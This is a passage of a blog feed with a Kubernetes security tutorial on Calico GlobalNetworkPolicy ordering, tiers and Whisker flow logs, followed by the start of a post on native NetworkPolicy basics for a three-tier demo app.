        <span class="hljs-attr">ports:</span> [<span class="hljs-number">80</span>]
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-number">09</span><span class="hljs-string">-backend-ingress-from-frontend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">tier:</span> <span class="hljs-string">default</span>
  <span class="hljs-attr">order:</span> <span class="hljs-number">9</span>
  <span class="hljs-attr">selector:</span> <span class="hljs-string">app</span> <span class="hljs-string">==</span> <span class="hljs-string">"api"</span>                              
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Ingress</span>]
  <span class="hljs-attr">ingress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">source:</span>
        <span class="hljs-attr">namespaceSelector:</span> <span class="hljs-string">projectcalico.org/name</span> <span class="hljs-string">==</span> <span class="hljs-string">"frontend"</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">80</span>]
</code></pre>
<h4 id="heading-backend-database-tcp-5432">Backend → Database (TCP :5432)</h4>
<pre><code class="lang-yaml"><span class="hljs-comment"># Database INGRESS from Backend</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-number">09</span><span class="hljs-string">-allow-backend-to-db-ingress</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">order:</span> <span class="hljs-number">9</span>
  <span class="hljs-attr">selector:</span> <span class="hljs-string">app</span> <span class="hljs-string">==</span> <span class="hljs-string">"db"</span>
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Ingress</span>]
  <span class="hljs-attr">ingress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">source:</span>
        <span class="hljs-attr">selector:</span> <span class="hljs-string">app</span> <span class="hljs-string">==</span> <span class="hljs-string">"api"</span>   <span class="hljs-comment"># backend pods</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">5432</span>]
<span class="hljs-meta">---</span>
<span class="hljs-comment"># Backend EGRESS to Database</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-number">09</span><span class="hljs-string">-allow-backend-to-db-egress</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">order:</span> <span class="hljs-number">9</span>
  <span class="hljs-attr">selector:</span> <span class="hljs-string">app</span> <span class="hljs-string">==</span> <span class="hljs-string">"api"</span>
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Egress</span>]
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">selector:</span> <span class="hljs-string">app</span> <span class="hljs-string">==</span> <span class="hljs-string">"db"</span>
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">5432</span>]
</code></pre>
<p>With these in place, your global deny still sets the baseline for the cluster, but these app‑specific allows at <code>order: 9</code> carve out the necessary paths cleanly.</p>
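<p>For context on why this works: the allows win only because the global deny evaluates <em>after</em> them, i.e. it sits at a larger <code>order</code> value. As a sketch (the actual deny from earlier in this post may use a different name, selector, or order value), the policy these order-9 allows are carving exceptions into looks something like:</p>
<pre><code class="lang-yaml">apiVersion: projectcalico.org/v3
kind: GlobalNetworkPolicy
metadata:
  name: default-deny
spec:
  order: 1000          # larger than 9, so the allows above are checked first
  selector: all()      # the real policy likely excludes system namespaces
  types: [Ingress, Egress]
  ingress: []
  egress: []
</code></pre>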
<h2 id="heading-app-flows-under-global-deny-option-c-tiers">App Flows Under Global Deny — Option C (Tiers)</h2>
<p>So far, we’ve looked at two ways to carve out app flows under a cluster-wide default-deny. But there’s a third way that is more Calico: <strong>tiers</strong>.</p>
<h3 id="heading-what-are-tiers">What are tiers?</h3>
<p>Calico evaluates policies by <strong>tier</strong>, then by <strong>order</strong>.</p>
<ul>
<li><p><strong>Tier</strong> = high-level category (e.g., <code>baseline</code>, <code>app</code>, <code>security</code>).</p>
</li>
<li><p><strong>Order</strong> = numeric priority <em>within</em> a tier (lower runs first).</p>
</li>
</ul>
<p>This lets you separate “cluster guardrails” from “app-specific rules” so they don’t trip over each other. Think of tiers like folders: guardrail policies go in one, app rules in another. The engine then processes them in order, tier by tier.</p>
<h3 id="heading-creating-tiers">Creating tiers</h3>
<p>Define tiers once:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Tier</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">app</span>
<span class="hljs-attr">spec:</span> { <span class="hljs-attr">order:</span> <span class="hljs-number">20</span> }
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Tier</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">baseline</span>
<span class="hljs-attr">spec:</span> { <span class="hljs-attr">order:</span> <span class="hljs-number">100</span> }
</code></pre>
<ul>
<li><p><code>app</code> tier (order 20): higher priority, runs before baseline.</p>
</li>
<li><p><code>baseline</code> tier (order 100): lower priority, catches everything else.</p>
</li>
</ul>
<h3 id="heading-app-flows-in-the-app-tier">App flows in the <code>app</code> tier</h3>
<p>Here, we recreate frontend→backend and backend→db flows, but put them in the <code>app</code> tier:</p>
<pre><code class="lang-yaml"><span class="hljs-comment"># Frontend → Backend</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">app-frontend-to-backend</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">tier:</span> <span class="hljs-string">app</span>
  <span class="hljs-attr">order:</span> <span class="hljs-number">10</span>
  <span class="hljs-attr">selector:</span> <span class="hljs-string">projectcalico.org/namespace</span> <span class="hljs-string">==</span> <span class="hljs-string">"frontend"</span>
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Egress</span>]
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">selector:</span> <span class="hljs-string">app</span> <span class="hljs-string">==</span> <span class="hljs-string">"api"</span>
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">80</span>]
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">app-backend-ingress</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">tier:</span> <span class="hljs-string">app</span>
  <span class="hljs-attr">order:</span> <span class="hljs-number">10</span>
  <span class="hljs-attr">selector:</span> <span class="hljs-string">app</span> <span class="hljs-string">==</span> <span class="hljs-string">"api"</span>
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Ingress</span>]
  <span class="hljs-attr">ingress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">source:</span>
        <span class="hljs-attr">namespaceSelector:</span> <span class="hljs-string">projectcalico.org/name</span> <span class="hljs-string">==</span> <span class="hljs-string">"frontend"</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">80</span>]
<span class="hljs-meta">---</span>
<span class="hljs-comment"># Backend → DB</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">app-backend-to-db</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">tier:</span> <span class="hljs-string">app</span>
  <span class="hljs-attr">order:</span> <span class="hljs-number">10</span>
  <span class="hljs-attr">selector:</span> <span class="hljs-string">projectcalico.org/namespace</span> <span class="hljs-string">==</span> <span class="hljs-string">"backend"</span>
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Egress</span>]
  <span class="hljs-attr">egress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">selector:</span> <span class="hljs-string">app</span> <span class="hljs-string">==</span> <span class="hljs-string">"db"</span>
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">5432</span>]
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">app-db-ingress</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">tier:</span> <span class="hljs-string">app</span>
  <span class="hljs-attr">order:</span> <span class="hljs-number">10</span>
  <span class="hljs-attr">selector:</span> <span class="hljs-string">app</span> <span class="hljs-string">==</span> <span class="hljs-string">"db"</span>
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Ingress</span>]
  <span class="hljs-attr">ingress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">action:</span> <span class="hljs-string">Allow</span>
      <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
      <span class="hljs-attr">source:</span>
        <span class="hljs-attr">namespaceSelector:</span> <span class="hljs-string">projectcalico.org/name</span> <span class="hljs-string">==</span> <span class="hljs-string">"backend"</span>
      <span class="hljs-attr">destination:</span>
        <span class="hljs-attr">ports:</span> [<span class="hljs-number">5432</span>]
</code></pre>
<h3 id="heading-guardrails-in-the-baseline-tier">Guardrails in the <code>baseline</code> tier</h3>
<p>Default-deny stays at the baseline tier:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">projectcalico.org/v3</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">GlobalNetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">baseline-default-deny</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">tier:</span> <span class="hljs-string">baseline</span>
  <span class="hljs-attr">selector:</span> <span class="hljs-string">all()</span>
  <span class="hljs-attr">types:</span> [<span class="hljs-string">Ingress</span>, <span class="hljs-string">Egress</span>]
  <span class="hljs-attr">ingress:</span> []
  <span class="hljs-attr">egress:</span> []
</code></pre>
<p>I didn't document creating and validating this last option, since it's more of the same. But the benefits of tiers should be clear:</p>
<ul>
<li><p><strong>Clear separation</strong>: app rules live in <code>app</code>, guardrails in <code>baseline</code>.</p>
</li>
<li><p><strong>Predictability</strong>: app policies are evaluated first; anything not allowed there hits the baseline deny.</p>
</li>
<li><p><strong>Scale</strong>: you can add more tiers later (e.g., <code>security</code> for IDS/IPS-style rules) without mixing concerns.</p>
</li>
</ul>
<p>In other words, tiers give you a clean “policy hierarchy” instead of one giant pile of YAML. Of our three options, tiers are clearly the best.</p>
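<p>As a sketch of how the hierarchy extends, a hypothetical <code>security</code> tier (name and order values here are illustrative) could slot in ahead of everything else simply by taking a lower tier order:</p>
<pre><code class="lang-yaml">apiVersion: projectcalico.org/v3
kind: Tier
metadata:
  name: security
spec: { order: 10 }   # evaluated before app (20) and baseline (100)
</code></pre>
<p>Policies placed in <code>security</code> then get first crack at every flow, without touching anything in the <code>app</code> or <code>baseline</code> tiers.</p>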
<hr />
<h2 id="heading-seeing-flows-with-calico-logs">Seeing Flows with Calico Logs</h2>
<p>At this point we’ve put relevant guardrails in place:</p>
<ul>
<li><p>Cluster-wide deny + DNS allow (GlobalNetworkPolicy).</p>
</li>
<li><p>App-specific flows (frontend → backend → db), just like in Part 1.</p>
</li>
</ul>
<p>But how do you know what’s really happening? Did the policy work? What got blocked, and what slipped through?</p>
<p>This is where Calico’s <a target="_blank" href="https://docs.tigera.io/calico/latest/observability/view-flow-logs">flow logs</a> come in — and yeah, I admit it, I love logs. They give you clear L3/L4 traffic visibility along with the exact Calico policies that allowed or denied each connection. It’s a newer feature, but one of the most valuable additions to Calico’s policy toolkit.</p>
<h3 id="heading-enabling-flow-logs">Enabling Flow Logs</h3>
<p>If you're not using the latest and greatest Calico, make sure you <a target="_blank" href="https://docs.tigera.io/calico/latest/operations/upgrading/kubernetes-upgrade#upgrading-an-installation-that-uses-the-operator">upgrade</a>; it's just two definition files to download and apply. It took me a while to figure out that flow logs depend on new CRDs that only ship with the newest version.</p>
<p>You need to enable Goldmane (I assume the name came from the MTG card?) for the logging API, and Whisker for the nice little UI built on top of Goldmane's logs:</p>
<pre><code class="lang-bash">kubectl apply -f - &lt;&lt;EOF
apiVersion: operator.tigera.io/v1
kind: Goldmane
metadata:
  name: default
---
apiVersion: operator.tigera.io/v1
kind: Whisker
metadata:
  name: default
EOF
</code></pre>
<p>To get this working in the lab you will most likely want to create a <code>NodePort</code> service for <em>Whisker</em> (your UI for flow logs), since it only gets a <code>ClusterIP</code> by default. I found this a bit tricky: my first instinct was to patch the existing service, but because it is managed by the operator, any patch simply gets reverted. You need to create a new service entirely. Create the following <code>Service</code> in the <code>calico-system</code> namespace via a saved file called <code>whisker-nodeport.yaml</code>:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Service</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">whisker-nodeport</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">calico-system</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">type:</span> <span class="hljs-string">NodePort</span>
  <span class="hljs-attr">ports:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">port:</span> <span class="hljs-number">8081</span>
    <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
    <span class="hljs-attr">targetPort:</span> <span class="hljs-number">8081</span>
    <span class="hljs-attr">nodePort:</span> <span class="hljs-number">30082</span> <span class="hljs-comment"># Or any free port; omit to let Kubernetes assign one</span>
  <span class="hljs-attr">selector:</span>
    <span class="hljs-attr">k8s-app:</span> <span class="hljs-string">whisker</span>
</code></pre>
<p>Apply as usual via <code>kubectl apply -f whisker-nodeport.yaml</code>.</p>
<p>Ready to roll.</p>
<p>Well, not quite. Since we're in the middle of working on network policies, it's a bit ironic that <em>Whisker</em> ships with its own network policy, which blocks access from your local machine or anywhere outside the node hosting Whisker. So we need to carve out an exception. I just did a blanket allow, but you might consider narrowing the ingress sources. Create the following <code>NetworkPolicy</code> in the <code>calico-system</code> namespace via a saved file called <code>whisker-np-allow.yaml</code>:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">networking.k8s.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">NetworkPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">whisker-nodeport-allow</span>
  <span class="hljs-attr">namespace:</span> <span class="hljs-string">calico-system</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">podSelector:</span>
    <span class="hljs-attr">matchLabels:</span>
      <span class="hljs-attr">app.kubernetes.io/name:</span> <span class="hljs-string">whisker</span>
  <span class="hljs-attr">policyTypes:</span> [<span class="hljs-string">Ingress</span>]
  <span class="hljs-attr">ingress:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">ports:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">protocol:</span> <span class="hljs-string">TCP</span>
          <span class="hljs-attr">port:</span> <span class="hljs-number">8081</span>
</code></pre>
<p>Apply as usual via <code>kubectl apply -f whisker-np-allow.yaml</code>. And now you should be able to navigate to your service using something like http://192.168.64.7:30082!</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1756857406979/f547f5be-ca3d-4795-b8a8-3840429f5869.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-checking-the-logs">Checking the Logs</h3>
<p>Now generate some traffic as we did at the start:</p>
<pre><code class="lang-bash">matt@controlplane:~/calico$ kubectl run -n frontend <span class="hljs-built_in">test</span> --image=nicolaka/netshoot -it --rm -- bash
If you don<span class="hljs-string">'t see a command prompt, try pressing enter.
test:~# curl -sS http://api.backend.svc.cluster.local:80
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Welcome to nginx!&lt;/title&gt;
&lt;style&gt;
html { color-scheme: light dark; }
body { width: 35em; margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif; }
&lt;/style&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;h1&gt;Welcome to nginx!&lt;/h1&gt;
&lt;p&gt;If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.&lt;/p&gt;

&lt;p&gt;For online documentation and support please refer to
&lt;a href="http://nginx.org/"&gt;nginx.org&lt;/a&gt;.&lt;br/&gt;
Commercial support is available at
&lt;a href="http://nginx.com/"&gt;nginx.com&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Thank you for using nginx.&lt;/em&gt;&lt;/p&gt;
&lt;/body&gt;
&lt;/html&gt;</span>
</code></pre>
<p>Now you should see some logs. Filter for Destination Namespace of <code>backend</code> and you should see something similar.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1756871127790/751963b4-4a61-4aee-8ed8-424a794c9269.png" alt class="image--center mx-auto" /></p>
<p>Cool, we can see that worked. Now let’s try something that doesn’t work. We’ll go ahead and do the same netshoot test, but this time make a call to the backend service from the default namespace.</p>
<pre><code class="lang-bash">matt@controlplane:~/np$ kubectl run <span class="hljs-built_in">test</span> --image=nicolaka/netshoot -it --rm -- bash
If you don<span class="hljs-string">'t see a command prompt, try pressing enter.
test:~# curl -sS http://api.backend.svc.cluster.local:80</span>
</code></pre>
<p>This will fail based on our network policies. So let’s see what Whisker shows.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1756938645158/e20f7ad6-d563-49c3-aee4-165b8195944e.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-reading-the-flow-log-verdict">Reading the Flow Log Verdict</h3>
<p>Here’s the example trace from Whisker when our traffic got denied:</p>
<pre><code class="lang-json">{
  <span class="hljs-attr">"enforced"</span>: [
    {
      <span class="hljs-attr">"kind"</span>: <span class="hljs-string">"EndOfTier"</span>,
      <span class="hljs-attr">"name"</span>: <span class="hljs-string">""</span>,
      <span class="hljs-attr">"namespace"</span>: <span class="hljs-string">""</span>,
      <span class="hljs-attr">"tier"</span>: <span class="hljs-string">"default"</span>,
      <span class="hljs-attr">"action"</span>: <span class="hljs-string">"Deny"</span>,
      <span class="hljs-attr">"policy_index"</span>: <span class="hljs-number">0</span>,
      <span class="hljs-attr">"rule_index"</span>: <span class="hljs-number">-1</span>,
      <span class="hljs-attr">"trigger"</span>: {
        <span class="hljs-attr">"kind"</span>: <span class="hljs-string">"GlobalNetworkPolicy"</span>,
        <span class="hljs-attr">"name"</span>: <span class="hljs-string">"default-deny"</span>,
        <span class="hljs-attr">"namespace"</span>: <span class="hljs-string">""</span>,
        <span class="hljs-attr">"tier"</span>: <span class="hljs-string">"default"</span>,
        <span class="hljs-attr">"action"</span>: <span class="hljs-string">"ActionUnspecified"</span>,
        <span class="hljs-attr">"policy_index"</span>: <span class="hljs-number">0</span>,
        <span class="hljs-attr">"rule_index"</span>: <span class="hljs-number">0</span>,
        <span class="hljs-attr">"trigger"</span>: <span class="hljs-literal">null</span>
      }
    }
  ],
  <span class="hljs-attr">"pending"</span>: [
    {
      <span class="hljs-attr">"kind"</span>: <span class="hljs-string">"EndOfTier"</span>,
      <span class="hljs-attr">"name"</span>: <span class="hljs-string">""</span>,
      <span class="hljs-attr">"namespace"</span>: <span class="hljs-string">""</span>,
      <span class="hljs-attr">"tier"</span>: <span class="hljs-string">"default"</span>,
      <span class="hljs-attr">"action"</span>: <span class="hljs-string">"Deny"</span>,
      <span class="hljs-attr">"policy_index"</span>: <span class="hljs-number">0</span>,
      <span class="hljs-attr">"rule_index"</span>: <span class="hljs-number">-1</span>,
      <span class="hljs-attr">"trigger"</span>: {
        <span class="hljs-attr">"kind"</span>: <span class="hljs-string">"GlobalNetworkPolicy"</span>,
        <span class="hljs-attr">"name"</span>: <span class="hljs-string">"01-dns-clients-egress"</span>,
        <span class="hljs-attr">"namespace"</span>: <span class="hljs-string">""</span>,
        <span class="hljs-attr">"tier"</span>: <span class="hljs-string">"default"</span>,
        <span class="hljs-attr">"action"</span>: <span class="hljs-string">"ActionUnspecified"</span>,
        <span class="hljs-attr">"policy_index"</span>: <span class="hljs-number">0</span>,
        <span class="hljs-attr">"rule_index"</span>: <span class="hljs-number">0</span>,
        <span class="hljs-attr">"trigger"</span>: <span class="hljs-literal">null</span>
      }
    }
  ]
}
</code></pre>
<p>What this is telling us:</p>
<ul>
<li><p><strong>Enforced:</strong> the cluster-wide <code>GlobalNetworkPolicy/default-deny</code> in the <code>default</code> tier denied the connection. No preceding allow matched, so the blanket deny won.</p>
</li>
<li><p><strong>Pending:</strong> <code>GlobalNetworkPolicy/01-dns-clients-egress</code> was evaluated but didn’t apply (this traffic wasn’t DNS, so that allow rule wasn’t relevant).</p>
</li>
<li><p><strong>Bottom line:</strong> the request was denied by the global default-deny; no app allow matched first, and unrelated DNS allow rules won’t help an HTTP call.</p>
</li>
</ul>
<blockquote>
<p>If you run the curl <strong>from the</strong> <code>frontend</code> namespace, you’ll typically see your app allow (e.g., frontend→backend) in <strong>pending</strong> when selectors don’t match — which is a clearer illustration of “the allow didn’t match, so default-deny fired.” Right now, the pending entry is your DNS policy because the request wasn’t DNS.</p>
</blockquote>
<hr />
<h2 id="heading-beyond-the-lab">Beyond the Lab</h2>
<p>The lab shows how Calico fills in the gaps left by raw <code>NetworkPolicy</code>. If you’re already running Calico as your CNI, you may have a lot of these features sitting idle without realizing it. Calico isn't just there to hand out pod IPs and push packets around. Using it that way works fine, but it leaves value on the table:</p>
<ul>
<li><p><strong>Global guardrails:</strong> set default-deny and DNS once, not in every namespace. It’s already in the box.</p>
</li>
<li><p><strong>Tiered policies:</strong> you can define guardrails at the top, app-specific rules later, and catch everything else at the end.</p>
</li>
<li><p><strong>Flow logs:</strong> new in Calico, and genuinely useful for visibility.</p>
</li>
</ul>
<p>Driving Calico only as a CNI is like leaving a stick-shift supercar in first gear. And sorry, there’s no automatic mode in the CNI world. And yes, the cat theme is a bit much — Calico, Tigera, Felix, Whisker, Goldmane — but at least the features deliver.</p>
<hr />
<h2 id="heading-coming-up-next">Coming Up Next</h2>
<p>We’ve now gone deep on Kubernetes <code>NetworkPolicy</code> and Calico’s extensions. Next up: <strong>Cilium</strong>.</p>
<p>Cilium takes a different tack, promising kernel-level enforcement, API-aware observability, and a whole lot of coolness. In the final part of this series we’ll look at how Cilium stacks up.</p>
]]></content:encoded></item><item><title><![CDATA[Service Boundaries: Kubernetes NetworkPolicy Basics]]></title><description><![CDATA[By default, Kubernetes is wide open. Of course you knew that already. Any pod can talk to any other pod, in any namespace, on any port. That makes life easy for anyone putting an app into prod, and just as easy for anyone who compromises one workload...]]></description><link>https://cloudsecburrito.com/service-boundaries-kubernetes-networkpolicy-basics</link><guid isPermaLink="true">https://cloudsecburrito.com/service-boundaries-kubernetes-networkpolicy-basics</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Security]]></category><category><![CDATA[networkpolicy]]></category><category><![CDATA[network security]]></category><category><![CDATA[Kubernetes Security]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Wed, 27 Aug 2025 22:42:46 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1756333998722/e27f495f-f42d-4497-98ef-65c486fdb0df.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>By default, Kubernetes is wide open. Of course you knew that already. Any pod can talk to any other pod, in any namespace, on any port. That makes life easy for anyone putting an app into prod, and just as easy for anyone who compromises one workload. Once they’re in, nothing stops them from laterally probing every service in the cluster.  </p>
<p>So I went down the path of figuring out how to build meaningful guardrails. The answer is <strong>service boundaries</strong>. Sounds complicated, but it really comes down to network policies. I’d heard about them, and I’d messed with CNIs like Calico and Cilium while setting up clusters, but hadn’t gone deep on what those policies could actually enforce.  </p>
<p>That naturally led to the realization that you need policies describing which pods <em>should</em> be talking to which other pods, and on what ports. Everything else gets dropped. The built-in tool for this is <a target="_blank" href="https://kubernetes.io/docs/concepts/services-networking/network-policies/"><code>NetworkPolicy</code></a>. With a few YAML manifests, you can flip a cluster from “anyone can connect to anything” into “deny by default, allow only what we mean.”</p>
<p>This is the start of a three-part series on service boundaries in Kubernetes:  </p>
<ul>
<li><strong>Part 1:</strong> Native <code>NetworkPolicy</code> for baseline L3/L4 segmentation.  </li>
<li><strong>Part 2:</strong> Scaling boundaries with Calico’s global defaults and external allowlists.  </li>
<li><strong>Part 3:</strong> Intent-aware controls with Cilium and Hubble for L7 enforcement.  </li>
</ul>
<p>But how does a <code>NetworkPolicy</code> really work? These guardrails operate at the <strong>network (L3) and transport (L4) layers</strong>. In practice that means you’re defining which pod groups (by label/namespace) can connect to which other pods (L3: IP/addressing), and on which ports and protocols (L4: TCP/UDP). It’s the foundation for segmentation: you’re not yet looking inside the traffic itself, just deciding who’s allowed to talk and on which ports. Later in the series we’ll climb up the stack into application-aware (L7) controls, but this post is about getting the baseline right at L3/L4.</p>
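<p>To make the L3/L4 split concrete, here is the general shape of a <code>NetworkPolicy</code> (a generic sketch, not one of the demo app's policies; all names here are placeholders). The selectors are the L3 “who”, the ports are the L4 “on what”:</p>
<pre><code class="lang-yaml">apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: example-allow
  namespace: example-ns        # NetworkPolicy is namespaced
spec:
  podSelector:                 # pods this policy applies to
    matchLabels:
      app: example
  policyTypes: [Ingress]
  ingress:
    - from:
        - namespaceSelector:   # L3: who may connect
            matchLabels:
              tier: trusted
      ports:
        - protocol: TCP        # L4: on which port/protocol
          port: 80
</code></pre>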
<p>We’ll start here with the basics: a three-tier app (frontend → backend → database), a default-deny posture, and a small set of explicit allows to make it work. Along the way we’ll pick up lessons, gotchas, and maybe a few regrets from trial and error.</p>
<hr />
<h2 id="heading-the-test-app-deploy-baseline-verification">The Test App (Deploy + Baseline Verification)</h2>
<p>Let's dive into our simple three-tier demo. Nothing fancy — just enough to show how service boundaries play out in practice:</p>
<ul>
<li><strong>Frontend</strong> namespace: a web pod (nginx or a tiny app) labeled <code>app=web</code></li>
<li><strong>Backend</strong> namespace: an API pod labeled <code>app=api</code></li>
<li><strong>DB</strong> namespace: a PostgreSQL pod labeled <code>app=postgres</code></li>
</ul>
<p>Traffic flow:</p>
<pre><code>frontend:web  ---&gt;  backend:api  ---&gt;  db:postgres
</code></pre><p><strong>Goal boundaries:</strong>  </p>
<ul>
<li>Frontend → Backend on <strong>80/TCP</strong> only  </li>
<li>Backend → DB on <strong>5432/TCP</strong> only  </li>
<li>DNS egress allowed everywhere  </li>
<li>Everything else: blocked</li>
</ul>
<h3 id="heading-deploy-the-demo-app-single-manifest">Deploy the demo app (single manifest)</h3>
<p>This will give you everything you need: namespaces, workloads, and services. Save as <code>test-app.yaml</code> and apply with <code>kubectl apply -f test-app.yaml</code>.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Namespace</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">frontend</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">tier:</span> <span class="hljs-string">frontend</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Namespace</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">backend</span>
  <span class="hljs-attr">labels:</span>
    <span class="hljs-attr">tier:</span> <span class="hljs-string">backend</span>
<span class="hljs-meta">---</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
